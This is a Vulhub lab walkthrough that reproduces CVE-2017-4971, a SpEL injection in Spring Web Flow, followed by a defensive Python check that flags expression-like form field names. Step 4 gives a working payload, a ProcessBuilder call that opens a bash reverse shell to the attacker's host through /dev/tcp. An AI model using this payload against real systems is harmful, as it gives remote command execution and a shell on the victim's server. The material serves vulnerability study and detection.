1. Set up the environment
cd vulhub/spring/CVE-2017-4971
docker-compose up -d
Affected versions: Spring Web Flow 2.4.0 ~ 2.4.4
Trigger conditions:
1. The useSpringBeanBinding parameter of the MvcViewFactoryCreator object needs to be set to false (the default value)
2. The BinderConfiguration object is empty in the flow view object
2. Reproducing the vulnerability
1. Log in
Click the link below and use the default account on the left to log in
http://192.168.25.128:8080/login
After logging in
Click Proceed
2. Capture packets
Enable Burp packet capture (intercept on) and click Confirm at the same time.
3. Start the nc listener
4. Modify the request data
&_(new+java.lang.ProcessBuilder("bash","-c","bash±i+>%26+/dev/tcp/192.168.155.2/1122+0>%261")) .start()=vulhub
Append it after the csrf parameter. Remember to change the IP and port to those of your own attack machine.
5. Reverse shell
Note: a 302 response means the request was redirected; just try again.
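A defender-side check for the request shape used in step 4, as an added example that is not part of the original walkthrough: it flags POST bodies containing a "_"-prefixed parameter whose name is not a plain property path. The sample requests, the addresses, the /hotels/booking path and the allow-list pattern are constructed assumptions, not values from the lab.

```python
import re
from urllib.parse import parse_qsl

# Assumption: a legitimate "_"-prefixed form field is "_" plus a plain
# property path: identifiers joined by ".", each with an optional [n] index.
_SEGMENT = r"[A-Za-z][A-Za-z0-9_]*(\[\d+\])?"
PROPERTY_PATH = re.compile(rf"^_{_SEGMENT}(\.{_SEGMENT})*$")

# Constructed sample requests: (source address, path, form-encoded body).
SAMPLE_REQUESTS = [
    ("192.0.2.10", "/hotels/booking",
     "_eventId_confirm=&_csrf=constructed-token"),
    ("192.0.2.11", "/hotels/booking",
     '_eventId_confirm=&_csrf=constructed-token'
     '&_(new+java.lang.ProcessBuilder("CONSTRUCTED")).start()=vulhub'),
    ("192.0.2.12", "/hotels/booking",
     "_csrf=constructed-token"
     "&_%28new%20java.lang.ProcessBuilder%28%22CONSTRUCTED%22%29%29.start%28%29=x"),
    ("192.0.2.13", "/hotels/booking",
     "booking.beds=2&_booking.amenities=on&_csrf=constructed-token"),
]


def expression_like_params(body: str) -> list:
    """Return decoded names of "_"-prefixed parameters that are not property paths."""
    hits = []
    # parse_qsl URL-decodes names first, so percent-encoded variants are
    # compared in the same form the server-side binder would see.
    for name, _value in parse_qsl(body, keep_blank_values=True):
        if name.startswith("_") and not PROPERTY_PATH.match(name):
            hits.append(name)
    return hits


def scan(requests) -> list:
    """Return (source, path, parameter name) for every flagged parameter."""
    findings = []
    for source, path, body in requests:
        for name in expression_like_params(body):
            findings.append((source, path, name))
    return findings


if __name__ == "__main__":
    for source, path, name in scan(SAMPLE_REQUESTS):
        print(f"ALERT {source} {path} expression-like field name: {name!r}")
```

A check like this belongs in a WAF rule or log pipeline in front of applications still running the affected versions; it does not replace upgrading.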